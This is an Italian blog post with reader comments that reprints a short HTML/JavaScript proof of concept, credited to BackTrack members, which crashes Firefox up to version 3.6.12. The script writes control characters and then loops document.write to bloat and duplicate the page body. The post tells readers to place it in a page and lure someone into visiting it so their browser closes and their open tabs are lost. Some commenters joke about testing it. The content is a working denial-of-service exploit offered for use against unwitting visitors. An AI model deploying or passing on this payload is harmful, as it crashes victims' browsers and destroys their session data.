<!-- 0day Mozilla Firefox <= 3.6.12 Remote Denial Of Service Credits: Emanuele 'emgent' Gentili <emgent@backtrack-linux.org> Marco 'white_sheep' Rondini <white_sheep@backtrack-linux.org> Alessandro 'scox' Scoscia <scox@backtrack.it> --> <script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script> <script> var i=0; for (i=0;i<=19999;i++) { document.write("a"); } for (i=0;i<=3;i++) { document.write(document.body.innerHTML); } </script>
Il simpatico script qui sopra blocca l’ultima versione di Mozilla Firefox, indipendentemente dal sistema operativo su cui gira.
Basta, quindi, inserirlo in una pagina HTML, indurre qualcuno a visitare quella pagina e voilà gli avete bloccato Firefox, costringendolo a chiudere brutalmente il software e a perdere i riferimenti a tutti i tab aperti (ci sono persone che potrebbero uccidere per una perdita del genere attenzione!).
Per ora si tratta solamente di un denial of service, non sono (ancora?) noti malware che sfruttano questo problema per altri scopi.
Il problema è stato scoperto dal gruppo italiano Backtrack.
6 risposte a “0day di Mozilla Firefox 3.6.12”
Ahem, il titolo va corretto, 3.6.12, non 3.2.12 🙂
Grazie per la segnalazione Gianluca!
ma va non ci credo!
Ora provo, vedrai che non funz…………………………………………………………………………………………………….
Eheheheeheh!
Spero nessun problema con la versione 4.
Scherzi a parte ho condotto alcuni test con delle versioni molto più vecchie di firefox ed hanno crashato tutte.
Presumibilmente la stragrande maggioranza delle installazioni è affetta da questo problerma e la cosa mi sembra molto grave.
Speriamo non ci siano più gravi implicazioni di sicurezza, come paventato da Luigi.